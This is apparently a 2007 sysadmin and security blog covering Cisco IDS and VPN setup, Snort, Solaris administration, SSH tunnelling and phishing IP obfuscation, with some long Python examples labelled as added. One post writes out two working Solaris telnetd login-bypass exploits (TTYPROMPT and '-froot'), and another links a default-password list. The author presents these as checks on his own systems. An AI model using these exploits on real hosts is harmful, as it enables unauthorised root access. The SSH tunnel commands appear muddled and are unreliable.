Friday, November 30, 2007

Cisco IDS

First, the link to research signatures:
http://tools.cisco.com/security/center/home.x

Now a tip for using the Cisco IDSM module without purchasing their overpriced control station. The IDSM module will not send syslog alerts, and by default it will not send SNMP traps either. So how do I get the IDSM module to send a trap when an event is triggered?

The key is the "Event Action Override", which allows you to set a default action for all signatures that fall within a specified Risk Rating (RR) range. In my case I set the default action of sending an SNMP trap for signatures with an RR of 18-100. 100 is the max RR, and 18 is the lowest RR of signatures that alert by default. This ensures that all signatures that are set to "alert" will produce an SNMP trap.

What about signatures that have an RR of 18 or more but shouldn't alert, such as signatures that are part of meta-events?

That is where the "Event Action Filter" comes into play. It allows us to specify signatures that we don't want to send a trap. You can specify signature(s), sub-signature(s), RR, etc. Then you simply select to override the SNMP trap action.

You might be thinking that this seems convoluted: why not simply adjust the signatures to trap? Because there are hundreds of signatures and they would need to be reviewed every time they are updated. By using the "Event Action Override", new signatures will automatically send a trap by default. Event Action Filtering will only be needed for a few noisy signatures, based on your environment.
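To make the override-then-filter order concrete, here is an added Python model (not Cisco code) of how the two combine: an override adds its actions to every event whose risk rating is inside its range, and a filter then removes actions from events matching its signature list and RR range. The action names produce-alert and request-snmp-trap are Cisco IPS action names; the signature ids, risk ratings and the meta-event component ids 2000/2001 are constructed for the example.

```python
"""Model of how Cisco IPS event action overrides and filters combine.

Added illustration, not Cisco code. Processing order assumed here (as the
post relies on it): overrides ADD actions to any event whose risk rating
falls in the override's range, then filters SUBTRACT actions from events
that match the filter's signature / risk-rating criteria.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    sig_id: int
    subsig_id: int
    risk_rating: int
    actions: frozenset = frozenset()   # actions the signature itself configures


@dataclass(frozen=True)
class Override:
    min_rr: int
    max_rr: int
    actions: frozenset                  # added to every event in the RR range


@dataclass(frozen=True)
class Filter:
    sig_ids: frozenset                  # signature ids the filter applies to
    min_rr: int
    max_rr: int
    actions: frozenset                  # removed from matching events
    subsig_ids: frozenset = frozenset() # empty = any sub-signature


def apply_policy(event, overrides, filters):
    """Return the final set of actions for one event."""
    actions = set(event.actions)
    for ov in overrides:                            # step 1: overrides add
        if ov.min_rr <= event.risk_rating <= ov.max_rr:
            actions |= ov.actions
    for flt in filters:                             # step 2: filters subtract
        if event.sig_id not in flt.sig_ids:
            continue
        if flt.subsig_ids and event.subsig_id not in flt.subsig_ids:
            continue
        if flt.min_rr <= event.risk_rating <= flt.max_rr:
            actions -= flt.actions
    return frozenset(actions)


# The policy from the post: trap on everything with RR 18-100, then suppress
# the trap for signatures that only feed a meta-event (ids 2000/2001 are
# constructed placeholders, not real Cisco signature numbers).
OVERRIDES = [Override(18, 100, frozenset({"request-snmp-trap"}))]
FILTERS = [Filter(sig_ids=frozenset({2000, 2001}), min_rr=0, max_rr=100,
                  actions=frozenset({"request-snmp-trap"}))]


def trap_decisions(events, overrides=OVERRIDES, filters=FILTERS):
    """Map (sig_id, subsig_id) -> whether an SNMP trap will be sent."""
    return {(e.sig_id, e.subsig_id):
            "request-snmp-trap" in apply_policy(e, overrides, filters)
            for e in events}


if __name__ == "__main__":
    sample = [Event(1000, 0, 25, frozenset({"produce-alert"})),   # ordinary alerting sig
              Event(2000, 1, 30, frozenset({"produce-alert"})),   # meta-event component
              Event(3000, 0, 10)]                                  # low RR, no alert
    for key, traps in trap_decisions(sample).items():
        print(key, "trap" if traps else "no trap")
```

Running it shows the ordinary signature traps, the meta-event component does not (the filter stripped the action the override added), and the low-RR event never gained the action at all. A new signature shipped in a future update with RR 18 or higher falls into the first case automatically, which is the point of the override.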

Friday, November 09, 2007

Cisco VPN and Filters

access-list vpn-crypto-domain permit ip object-group local-hosts object-group remote-hosts

# Note these are used for both incoming and outgoing connections!
access-list vpn-acl permit tcp object-group remote-hosts object-group localhosts eq 22
access-list vpn-acl permit icmp object-group remote-hosts object-group localhosts
access-list vpn-acl permit tcp object-group localhosts object-group remote-hosts

crypto map VPN_MAP1 230 match address vpn-crypto-domain
crypto map VPN_MAP1 230 set peer xx.xx.xx.xx
crypto map VPN_MAP1 230 set transform-set ESP-AES256-SHA

group-policy vpn-filter internal
group-policy vpn-filter attributes
 vpn-filter value vpn-acl
 pfs disable

tunnel-group xx.xx.xx.xx type ipsec-l2l
tunnel-group xx.xx.xx.xx ipsec-attributes
 pre-shared-key *
tunnel-group xx.xx.xx.xx general-attributes
 default-group-policy vpn-filter

Thursday, September 27, 2007

Tunnel of Love

Quick and easy SSH tunneling:

Scenario: I'm at home and I need to connect to a GUI at work. The problem is that I cannot get to the GUI directly through the firewall.

Solution: an SSH tunnel to proxy the connection, since SSH is allowed through.

Systems Involved:
1. Home Computer (Windows with Cygwin & ssh)
2. Work computer (Solaris with SSH running)
3. HTTPS gui server.

Step 1: Create a listener on the work computer that will forward the ssh connection to the https server.
work-computer # ssh -R 22:guiserver:443 username@work-computer

Step 2: Create a listener on your home computer that will forward the https connection through SSH to the work computer's proxy.
home-computer # ssh -L 8080:localhost:22 username@work-computer

Step 3: Test
https://localhost:8080


* This is nothing new
** This is my cheat sheet

Monday, September 17, 2007

Upgrading Snort

Upgrading Snort is not really that difficult a procedure; the basics are:
  1. Stop the running snort
    • Backup the current snort installation
    • mv /usr/local/snort /usr/local/snort.old
  2. Configure Snort
    • ./configure --prefix=/usr/local/snort
  3. Compile & Install
    • make; make install
  4. Now, I usually copy the old configuration files to the new installations.
  5. Run the rc scripts and BAM! good as gold.
Except when you go from such an old version, you will get the following error:

FATAL ERROR: database: The underlying database seems to be running an older version of the DB schema (current version=106, required minimum version= 107). If you have an existing database with events logged by a previous version of snort, this database must first be upgraded to the latest schema (see the snort-users mailing list archive or DB plugin documention for details). If migrating old data is not desired, merely create a new instance of the snort database using the appropriate DB creation script (e.g. create_mysql, create_postgresql, create_oracle, create_mssql) located in the contrib\ directory. See the database documentation for cursory details (doc/README.database). and the URL to the most recent database plugin documentation.

The problem we run into is that the new version of Snort requires an upgrade to the database schema. Now, the readme in the distro will point you to the scripts included in the distro's contrib directory. These will build a new snort database.

The problem is that I have 90 days worth of events I don't want to lose. So the question is how to change the schema without losing the data. The answer is simply:
  1. ALTER TABLE signature ADD sig_gid INT UNSIGNED;
    • This is the only addition needed by the new version of snort.
  2. INSERT INTO schema (vseq, ctime) VALUES ('107', now());
    • Snort queries the schema version when it starts to make sure the DB is compatible.
  3. DELETE FROM schema WHERE vseq=106;
    • Now we need to remove the previous version (106, the "current version" reported in the error above) from the table.
Now, restart Snort...and everything should come up fine.
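The three statements above are only safe if they run as one unit and only against a database that is really at version 106. Here is an added Python example (not Snort's own contrib scripts) that wraps them in a guarded transaction; it uses an in-memory SQLite database as a stand-in for the MySQL backend so it runs offline, and the sample `schema` and `signature` tables are constructed with only the columns the post needs.

```python
"""Apply the Snort DB schema bump from the post (106 -> 107) as one guarded
transaction. Added example, not Snort's own migration script. SQLite stands
in for MySQL/PostgreSQL so the code runs offline; the table and column names
are the ones the post uses (MySQL's now() becomes datetime('now') here).
"""
import sqlite3

OLD_VERSION = 106
NEW_VERSION = 107


def make_old_style_db():
    """Constructed sample: a tiny v106 database with one logged signature."""
    conn = sqlite3.connect(":memory:", isolation_level=None)   # manual BEGIN/COMMIT
    conn.executescript("""
        CREATE TABLE schema (vseq INTEGER NOT NULL, ctime TEXT NOT NULL);
        CREATE TABLE signature (sig_id INTEGER PRIMARY KEY, sig_name TEXT,
                                sig_class_id INTEGER, sig_priority INTEGER,
                                sig_rev INTEGER, sig_sid INTEGER);
        INSERT INTO schema (vseq, ctime) VALUES (106, '2007-06-01 00:00:00');
        INSERT INTO signature VALUES (1, 'ICMP PING', 1, 3, 5, 384);
    """)
    return conn


def current_schema_version(conn):
    """The version Snort will check at startup (highest vseq row)."""
    return conn.execute("SELECT MAX(vseq) FROM schema").fetchone()[0]


def upgrade_schema(conn):
    """Run the post's three statements only if the DB is exactly v106.

    Returns the schema version after the call, so a second run is a no-op
    instead of adding a duplicate column or a stray version row.
    """
    version = current_schema_version(conn)
    if version != OLD_VERSION:
        return version                       # already done, or not what we expect
    try:
        conn.execute("BEGIN")
        conn.execute("ALTER TABLE signature ADD sig_gid INT UNSIGNED")
        conn.execute("INSERT INTO schema (vseq, ctime) VALUES (?, datetime('now'))",
                     (NEW_VERSION,))
        conn.execute("DELETE FROM schema WHERE vseq = ?", (OLD_VERSION,))
        conn.execute("COMMIT")
    except sqlite3.Error:
        conn.execute("ROLLBACK")             # leave the old schema untouched on any failure
        raise
    return current_schema_version(conn)


def signature_columns(conn):
    """Column names of the signature table, to confirm sig_gid was added."""
    return [row[1] for row in conn.execute("PRAGMA table_info(signature)")]


if __name__ == "__main__":
    db = make_old_style_db()
    print("before:", current_schema_version(db), signature_columns(db))
    print("after: ", upgrade_schema(db), signature_columns(db))
```

Take a dump of the real database before running anything like this against it; the rollback protects you from a half-applied migration, not from a wrong one.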

Friday, May 11, 2007

Solaris & Linux Apps

You can read the full instructions here:
http://www.opensolaris.org/os/community/brandz/install/


# zonecfg -z Citrix
Citrix: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:Citrix> create -t SUNWlx
zonecfg:Citrix> set zonepath=/export/zones/Citrix_root
zonecfg:Citrix> add net
zonecfg:Citrix:net> set address=192.168.0.20/24
zonecfg:Citrix:net> set physical=iprb0
zonecfg:Citrix:net> end
zonecfg:Citrix> add attr
zonecfg:Citrix:attr> set name="audio"
zonecfg:Citrix:attr> set type=boolean
zonecfg:Citrix:attr> set value=true
zonecfg:Citrix:attr> end
zonecfg:Citrix> commit
zonecfg:Citrix> exit
#

I used the CentOS tarball distribution that was made for Solaris 10 SCLA:
http://opensolaris.org/os/community/brandz/downloads.


# zoneadm -z Citrix install -d /export/home/jc209962/centos_fs_image.tar
Installing zone 'Citrix' at root directory '/export/zones/Citrix_root'
from archive '/export/home/jc209962/centos_fs_image.tar'

# zoneadm list -iv
ID NAME STATUS PATH BRAND IP
0 global running / native shared
- Citrix installed /export/zones/Citrix_root lx shared

#
# zlogin Citrix
[Connected to zone 'Citrix' pts/5]
Welcome to your shiny new Linux zone.

- The root password is 'root'. Please change it immediately.

- To enable networking goodness, see /etc/sysconfig/network.example.

- This message is in /etc/motd. Feel free to change it.

For anything more complicated, see:
http://opensolaris.org/os/community/brandz/

You have mail.
-bash-2.05b# uname -a
Linux Citrix 2.4.21 BrandZ fake linux i686 i686 i386 GNU/Linux

Solaris 10, sconadm, and patching

I'm not a big fan of GUIs for simple tasks. Patching, IMHO is a simple task, especially on a home system.

Servers can be a bit trickier...since you want to test the patches and make sure that you aren't going to break something with one of the recommended patches.

But your home system...you really just want to apply all the newest patches for your system.

Now Sun's Update Manager is cool. It's really been a long time coming, given the perl scripts that have been around for years that did the same thing. But finally it's built in and it's pretty stable.

However, the CLI for it is IMHO the best part.

Here is all that I need to do to patch my system:

# smpatch update

Done, all the latest patches will be downloaded and installed. I put the command in cron and I will always be good to go.

However, before I can update, I must register to download the patches. This is done easily with sconadm

First, create a text file that has the following (remember to use your own values). The only values required are the ones I have filled in.

# vi /tmp/registration.txt
userName=sunsolve_user
password=sunsolvepass
hostName=
subscriptionKey=
portalEnabled=false
proxyHostName=
proxyPort=
proxyUserName=
ProxyPassword=
#

Now, we use this script to register the system with SunSolve:

# sconadm register -a -r /tmp/registration.txt

Goldmine right? Well, in my case...not so fast. I ended up with a lot of errors:

sconadm is running
javax.management.remote.JMXProviderException: Connection refused at com.sun.cacao.rmi.impl.CacaoRMIConnectorProvider.newJMXConnector(CacaoRMIConnectorProvider.java:415) at javax.management.remote.JMXConnectorFactory.getConnectorAsService(JMXConnectorFactory.java:415)

Why?

Well, if you are a DHCP user, you will need to make sure that your hostname can be resolved. For me, this meant I had to add it to /etc/hosts and reboot the system.

I have a small network, so I always get the same IP for this system. Added the line to /etc/hosts...and boom. I was in.

Final note, for those Solaris 10 DHCP users with a hostname of "Unknown": simply create the file /etc/nodename with the hostname you want:

# echo "MyHostName" > /etc/nodename

Now reboot!

Monday, April 09, 2007

Creating Solaris Packages

Here is the link: http://www.sunfreeware.com/pkgadd.html

1. Create a clean /usr/local/ for install.

2. Go into the /usr/local directory with

unix# cd /usr/local

and run the command

unix# find . -print | pkgproto > prototype

This will produce the prototype file in /usr/local.

3. Now take your editor and edit out the line that has the prototype file name in it. Then add a line like

i pkginfo=./pkginfo

4. Finally, convert all the user and group ownerships from whatever they are to bin and bin (or whatever, see Red note below). An example file looks like

i pkginfo=./pkginfo
d none bin 0755 bin bin
f none bin/prog 0755 bin bin
d none doc 0755 bin bin
f none doc/doc1 0644 bin bin
d none lib 0755 bin bin
f none lib/lib1 0644 bin bin
d none man 0755 bin bin
d none man/man1 0644 bin bin
f none man/man1/prog.1 0444 bin bin

5. Now in /usr/local create a file pkginfo with contents for your package like

PKG="SCprog"
NAME="prog"
ARCH="sparc"
VERSION="1.00"
CATEGORY="application"
VENDOR="Christensen and Associates, Inc."
EMAIL="steve@smc.vnet.net"
PSTAMP="Steve Christensen"
BASEDIR="/usr/local"
CLASSES="none"
These values are fairly obvious, but they mean

PKG = the name you have chosen for the package directory
NAME = the program name
ARCH = the operating system version
VERSION = the version number for your program
CATEGORY = the program is an application
VENDOR = whoever wrote the software
EMAIL = an email contact
PSTAMP = the person who did the port perhaps
BASEDIR = the /usr/local directory where the files install
CLASSES = just put none here

6. Run pkgmk

Now while in /usr/local, run
unix# pkgmk -r `pwd`
This places a file in /var/spool/pkg called SCprog.

7. Run pkgtrans

Now do
unix# cd /var/spool/pkg
and then
unix# pkgtrans -s `pwd` /tmp/prog-1.00

You will be asked to select which package you want to make. Select your package name (like SCprog) by number.

This now creates a file called prog-1.00 in /tmp.
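Steps 2 through 4 above (run find through pkgproto, drop the prototype line, add the pkginfo line, rewrite every owner and group to bin) are mechanical, and this is where mistakes like a world-writable file or a stray build input creep into a package. Here is an added Python example, not sunfreeware's or Sun's code, that produces the same prototype format from a directory tree; it only emits the d (directory) and f (regular file) entry types shown in the sample file and skips symlinks and devices, and the bin:bin ownership is a constant you would change per the page's note.

```python
"""Generate a pkgmk prototype file the way steps 2-4 of the post describe.

Added example, not sunfreeware's or Sun's code. It reproduces only the
'd none ...' and 'f none ...' entry forms shown on the page, forces the
owner/group to bin:bin, leaves out the prototype and pkginfo build inputs,
and ignores symlinks and device nodes.
"""
import os
import stat
from pathlib import Path

OWNER = GROUP = "bin"            # what step 4 rewrites every entry to


def prototype_entries(root):
    """Yield prototype lines for everything under root, paths relative to root."""
    root = Path(root)
    yield "i pkginfo=./pkginfo"                    # the line step 3 adds by hand
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        filenames.sort()                           # deterministic output
        for name in dirnames + filenames:
            path = Path(dirpath) / name
            rel = path.relative_to(root).as_posix()
            if rel in ("prototype", "pkginfo"):
                continue                           # never package the build inputs
            st = path.lstat()
            if stat.S_ISDIR(st.st_mode):
                kind = "d"
            elif stat.S_ISREG(st.st_mode):
                kind = "f"
            else:
                continue                           # symlinks / devices: out of scope
            mode = stat.S_IMODE(st.st_mode)        # permission bits only, e.g. 0755
            yield f"{kind} none {rel} {mode:04o} {OWNER} {GROUP}"


def world_writable(lines):
    """Entries whose mode grants write to 'other': worth fixing before pkgmk."""
    bad = []
    for line in lines:
        parts = line.split()
        if parts[0] in ("d", "f") and int(parts[3], 8) & 0o002:
            bad.append(parts[2])
    return bad


def write_prototype(root):
    """Write root/prototype (as step 2 does) and return its lines."""
    lines = list(prototype_entries(root))
    (Path(root) / "prototype").write_text("\n".join(lines) + "\n")
    return lines


if __name__ == "__main__":
    import sys
    for entry in write_prototype(sys.argv[1] if len(sys.argv) > 1 else "/usr/local"):
        print(entry)
```

Run it against the clean /usr/local from step 1 and diff its output with what `find . -print | pkgproto` gives you; the world_writable check is the kind of review you would want before handing the package to pkgmk.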

Tuesday, March 27, 2007

Easy Solaris Telnet Exploits

http://www.milw0rm.com/exploits/57

Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin

OR

http://weblog.infoworld.com/securityadviser/archives/2007/02/huge_easy_solar.html

telnet -l "-froot" [hostname]

Every once in a while I run across a box running telnet internally and feel compelled to at least try these two. If you are running telnet, which is bad enough, for God's sake at least patch (and put tcp wrappers, iptables, etc. in front of it).

Monday, March 19, 2007

QR Codes

qrcode

http://qrcode.kaywa.com/

Interesting site that allows you to create QR codes, which are very similar to barcodes, except they are square and can hold around 4000 characters of text.

You can also download a QRCode scanner from the site that can be loaded on your cell phone, that uses the cell phone camera as a scanner.

Friday, March 16, 2007

Windows Logon Types

http://www.windowsecurity.com/articles/Logon-Types.html

Logon Type 2 – Interactive
Logon Type 3 – Network
Logon Type 4 – Batch
Logon Type 5 – Service
Logon Type 7 – Unlock
Logon Type 8 – NetworkCleartext
Logon Type 9 – NewCredentials
Logon Type 10 – RemoteInteractive
Logon Type 11 – CachedInteractive

Wednesday, March 14, 2007

Blastwave: Solaris Software made Simple

http://www.blastwave.org/howto.html

This walks you through installing one of the best Solaris software management systems ever.

Update packages easily.
Install packages effortlessly.

Obviously this is not meant for your production servers, but it works great on my desktop system.

Tuesday, March 13, 2007

CD-RW on Solaris

http://docsun.cites.uiuc.edu/sun_docs/C/solaris_9/SUNWaadm/SYSADV1/p65.html#MEDACCESS-5

How to burn a CD in Solaris. Sadly this is the first time in 10 years that I've actually had a CD/DVD-RW on a Sparc system (Ultra45). So this is the first time I've had a chance to mess with it.

Summary:

$ cdrw -l
Looking for CD devices...
Node Connected Device Device type
----------------------+--------------------------------+-----------------
cdrom1 | YAMAHA CRW8424S 1.0d | CD Reader/Writer

$ mkisofs -r /pathname > cd-file-system

-r

Creates Rock Ridge information and resets file ownerships to zero.

/pathname

Identifies the pathname used to create the ISO 9660 file system.

> cd-file-system

Identifies the name of the file system to be put on the CD.

Copy the CD file system onto the CD.

$ cdrw -i cd-file-system

-i cd-file-system

Specifies the image file for creating a data CD.

Monday, March 12, 2007

Firekeeper - FireFox IDS

http://firekeeper.mozdev.org

First official alpha release of Firekeeper, an Intrusion Detection and Prevention System for Firefox, is available for download. Firekeeper adds an additional layer of protection to the browser. It uses flexible rules similar to Snort's to describe browser-based attack attempts. All incoming HTTP and HTTPS traffic is scanned with these rules. HTTPS and compressed responses are scanned after decryption/decompression. A suspicious response can trigger an alert that is displayed to the user, or can be automatically cancelled, depending on the action specified in the rule. Firekeeper uses the very effective pattern matching engine from Snort and, with well written rules, doesn't have a negative impact on browser performance.

Friday, March 02, 2007

Addictive Zombie Game

Normally, I get tired of zombie games post haste...this one is pretty cool:

http://www.newgrounds.com/portal/view/363126

Thursday, March 01, 2007

IP Obfuscation

The phishing blog PhishTank had the following article which was rather interesting:
http://www.phishtank.com/blog/2007/02/09/the-case-of-the-mysterious-hostname/


Basically, it reminds us that URLs (www.hostname.top) and IPs (123.123.123.123) are only formatted this way for human consumption; the computer can take the information in many forms. Take the following links:

www.phishtank.com
http://66.135.40.79/
http://1116153935/
http://0X42.0207.10319/
http://0102.8857679/

By writing the IP address as something other than four base-10 octets (a single decimal integer, or octal and hex pieces), it becomes harder for humans and human-made filters to pick it out.
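The defensive answer is to normalise the host before comparing it to a blocklist, so every spelling of the address is judged as the same dotted quad. Here is an added Python example, not PhishTank's code, implementing the classic inet_aton parsing rules (1 to 4 dot-separated parts, each decimal, octal with a leading 0, or hex with 0x, the last part filling the remaining low-order bytes); it goes beyond the four URLs above in that it handles any of those forms, and the URLs themselves are the ones from the post.

```python
"""Normalise the host part of a URL to dotted-decimal so a filter compares
the same thing a browser connects to. Added example, not PhishTank's code.
Implements the inet_aton rules: 1-4 dot-separated numeric parts, each
decimal, octal (leading 0) or hex (0x), with the last part supplying all
remaining low-order bytes.
"""
import re
from urllib.parse import urlsplit

# decimal, octal or hex literal; "09" or "0x" alone are rejected
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _part_value(text):
    if not _PART.match(text):
        raise ValueError(f"not a numeric address part: {text!r}")
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text.startswith("0"):
        return int(text, 8)
    return int(text, 10)


def canonical_ipv4(host):
    """Return 'a.b.c.d' for any inet_aton-style numeric host, else None.

    '66.135.40.79', '1116153935', '0X42.0207.10319' and '0102.8857679'
    (the forms in the post) all come back as 66.135.40.79.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_part_value(p) for p in parts]
    except ValueError:
        return None
    # Every part but the last is one byte; the last one fills the rest
    # (2 parts = a.bbb, 3 parts = a.b.cc, 4 parts = a.b.c.d).
    lead, last = values[:-1], values[-1]
    if any(v > 0xFF for v in lead):
        return None
    last_width = 4 - len(lead)
    if last >= 1 << (8 * last_width):
        return None
    addr = 0
    for v in lead:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_width)) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def normalise_url_host(url):
    """Canonical dotted quad for a URL's host, or the hostname unchanged when
    it is a name rather than a numeric address."""
    host = urlsplit(url if "//" in url else "//" + url).hostname or ""
    return canonical_ipv4(host) or host


if __name__ == "__main__":
    # The five links from the post, as constructed sample input.
    for link in ("www.phishtank.com", "http://66.135.40.79/", "http://1116153935/",
                 "http://0X42.0207.10319/", "http://0102.8857679/"):
        print(f"{link:28} -> {normalise_url_host(link)}")
```

Compare the blocklist against the normalised value, not the raw string; a rule written for 66.135.40.79 then also catches the other three spellings.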

Wednesday, February 28, 2007

Cell Phone as Home Phone

Dock And Talk: http://phonelabs.com/prd05.asp

Here is a pretty cool little device that converts your cell phone into your home phone. It is compatible with a number of wireless home phones on the market.

It's listed for $160, which is comparable to good 2.5 or 5.8 GHz phone sets out there.

Saturday, February 24, 2007

Torpedo Comics

Torpedo Comics, New online comics store started by the drummer from System of a Down.

The store isn't even up and running yet, but the message board is. It's currently a small online community of comic fans...but I've been enjoying it.

Friday, February 23, 2007

Microsoft Security Analyzer

http://www.microsoft.com/technet/security/tools/mbsa2/default.mspx

This is a good tool to scan systems remotely for security issues.

The checks that are of interest:
1. Security Patches
2. Weak passwords
3. Firewall running

Here are the pros & cons

Pros:
1. Can scan multiple systems
2. Does several good security checks
3. Easy to use GUI

Cons:
1. No command line
2. No plain-text/CSV report option

Friday, February 16, 2007

Default Password List

Every once in a while it's nice to know the default password for a specific device or software package.

http://www.virus.org/default-password/view/All/1/

This is a nice collection of the default passwords for a wide range of products, with an easy-to-use search.

'nuff said

Tuesday, February 06, 2007

SONET Basics

Here is the link:
http://www.iec.org/online/tutorials/sonet/topic01.html

SONET defines a technology for carrying many signals of different capacities through a synchronous, flexible, optical hierarchy. This is accomplished by means of a byte-interleaved multiplexing scheme. Byte-interleaving simplifies multiplexing and offers end-to-end network management.

The first step in the SONET multiplexing process involves the generation of the lowest level or base signal. In SONET, this base signal is referred to as synchronous transport signal–level 1, or simply STS–1, which operates at 51.84 Mbps. Higher-level signals are integer multiples of STS–1, creating the family of STS–N signals in Table 1. An STS–N signal is composed of N byte-interleaved STS–1 signals. This table also includes the optical counterpart for each STS–N signal, designated optical carrier level N (OC–N).


Monday, February 05, 2007

Solaris & Active Directory

Here is the Link:
http://blog.scottlowe.org/2006/08/15/solaris-10-and-active-directory-integration/

This is the best guide I've seen to getting the two to work together. I've worked on this before and have to say the initial documents from Sun were a little confusing.

This document seems to be pretty straight forward. Of course until I get my lab back up and running I can't try this out.

Sunday, February 04, 2007

Snort Signature Writing

Here is the link:
http://www.snort.org/docs/snort_htmanuals/htmanual_2.4/node14.html

Here are the basics...

Rule format:
Action Protocol SrcIP SrcPort Direction DestIP DestPort (Packet Sig. | Msg)

Example:
alert tcp any any -> 192.168.0.1/24 111 (content:"|00 01 86 a5|"; msg:"mountd access";)

Dynamic rule sets are also explained.
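To see what the header and the content option actually do, here is an added Python example (not Snort's own engine) that parses the rule grammar shown above, decodes the |..| hex notation, and tests a rule against a packet's 5-tuple and payload; it handles the fields in the format line (action, protocol, addresses, ports, direction) plus the content and msg options only, and the sample payload is a constructed RPC call carrying program number 100005 (0x000186a5, the bytes the mountd rule looks for).

```python
"""Parse a Snort rule of the form the post shows and test it against a packet.

Added example, not Snort's engine. Supports: action, protocol, CIDR or 'any'
addresses, numeric or 'any' ports, -> and <> directions, and the content
(with |hex| escapes) and msg options. Nothing else from the rule language.
"""
import ipaddress
import re
from dataclasses import dataclass

_HEADER = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)
# option name, optional colon, double-quoted value, optional ';'
_OPT = re.compile(r'\s*(\w+)\s*:?\s*"((?:[^"\\]|\\.)*)"\s*;?')


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    content: bytes
    msg: str


def decode_content(text):
    """Turn 'abc|00 01 86 a5|def' into bytes; the |..| sections are hex."""
    out = bytearray()
    for i, chunk in enumerate(text.split("|")):
        if i % 2 == 0:
            out += chunk.encode("latin-1")      # literal text outside the pipes
        else:
            out += bytes.fromhex(chunk)         # hex inside the pipes
    return bytes(out)


def parse_rule(text):
    m = _HEADER.match(text.strip())
    if not m:
        raise ValueError("unrecognised rule header")
    opts = dict(_OPT.findall(m.group("opts")))
    if "content" not in opts:
        raise ValueError("rule has no content option")
    return Rule(m["action"], m["proto"], m["src"], m["sport"], m["dir"],
                m["dst"], m["dport"], decode_content(opts["content"]),
                opts.get("msg", ""))


def _addr_ok(spec, addr):
    if spec == "any":
        return True
    # strict=False lets '192.168.0.1/24' mean the whole /24, as Snort does
    return ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)


def _port_ok(spec, port):
    return spec == "any" or int(spec) == port


def rule_matches(rule, proto, src, sport, dst, dport, payload):
    """True if the packet fits the header and the content bytes are in the payload."""
    if proto != rule.proto or rule.content not in payload:
        return False
    forward = (_addr_ok(rule.src, src) and _port_ok(rule.sport, sport)
               and _addr_ok(rule.dst, dst) and _port_ok(rule.dport, dport))
    if forward or rule.direction == "->":
        return forward
    # '<>' rules also match the reverse direction
    return (_addr_ok(rule.src, dst) and _port_ok(rule.sport, dport)
            and _addr_ok(rule.dst, src) and _port_ok(rule.dport, sport))


# Constructed sample: the mountd rule from the post and an RPC call header
# (xid, CALL, rpcvers 2, program 100005 = 0x000186a5, version 3, proc 1).
MOUNTD_RULE = ('alert tcp any any -> 192.168.0.1/24 111 '
               '(content:"|00 01 86 a5|"; msg:"mountd access";)')
SAMPLE_PAYLOAD = bytes.fromhex("00000001" "00000000" "00000002"
                               "000186a5" "00000003" "00000001")

if __name__ == "__main__":
    rule = parse_rule(MOUNTD_RULE)
    hit = rule_matches(rule, "tcp", "10.0.0.5", 40000, "192.168.0.77", 111, SAMPLE_PAYLOAD)
    print(f"{rule.action} {rule.msg!r}: {'MATCH' if hit else 'no match'}")
```

The same payload sent to a host outside 192.168.0.0/24, or over UDP, does not fire, which is why the header is as much a part of the signature as the content bytes.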

CISCO: DoS Prevention

Here is the link:
http://www.ciscopress.com/articles/article.asp?p=345618&rl=1

This is an excerpt from the book Cisco Firewall Router Security.

A Denial-of-Service (DoS) attack can cause immense harm to your business. In this chapter, you can learn how to deal with such an attack, and minimize the damage done.

There are links to other chapters, but this excerpt will give you some information on detecting DoS attacks, implementing ACLs, and tuning IP settings to help prevent or at least survive a DoS attack.

DTrace for Fun and Profit

Here are the links:

Yeah, there is no way to sum up any of the info in the blog in a useful way. So check out these links, they provide different resources to learn the DTrace tools in Solaris.

Windows Computer Investigation Guide

Here is the link:
http://www.microsoft.com/technet/security/guidance/disasterrecovery/computer_investigation/default.mspx
This guide is intended for IT professionals in the United States who need a general understanding of computer investigations, including many of the procedures that can be used in such investigations and protocols for reporting incidents
A secondary bookmark that you will need to use this guide is Sysinternals:
http://www.microsoft.com/technet/sysinternals/default.mspx

Some of the tools I use most often in my investigations are:
  • PSExec:
    • Remotely execute processes with limited-user rights
  • PSLoggedOn:
    • Show users logged on to a system
  • PSLogList:
    • Dump event log records
  • PSTools:
    • The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.
You create a nice little batch script and you can automate information collection with these tools.

Checkpoint CLI guide

Here is the link:
http://www.secwiz.com/Default.aspx?tabid=52

Here is the CLI guide to checkpoint FW-1

cphaprob state
Status of high availability modules; shows which gateway is active, standby and down

fw tab -t
Displays firewall state tables

fw log -f
Displays the log continuously.


In general, each NG log file is composed of four files:
    • xx.log — stores the log records
    • xx.logptr — pointers to the beginning of each log record
    • xx.loginitial_ptr — pointers to the beginning of each log chain (logs with the same connection id)
    • xx.logaccount_ptr — pointers to the beginning of each accounting record
In the case of the audit log file the files are:
    • xx.adtlog
    • xx.adtlogptr
    • xx.adtloginitial_ptr
    • xx.adtlogaccount_ptr
More info is found in the guide.

Netfilter or IPTables

Here is the link:
http://www.redhat.com/docs/manuals/linux/RHL-9-Manual/security-guide/ch-fw.html

This is from Red Hat, but it pertains to any system you install iptables on...it also has some basic firewall info like:

There is a distinction between the REJECT and DROP target actions. The REJECT target denies access and returns a connection refused error to users who attempt to connect to the service. The DROP, as the name implies, drops the packet without any warning to telnet users. Administrators can use their own discretion when using these targets; however, to avoid user confusion and attempts to continue connecting, the REJECT target is recommended.

Good guide to using IPTables.

Checkpoint: Performance Tuning

Here is the link:
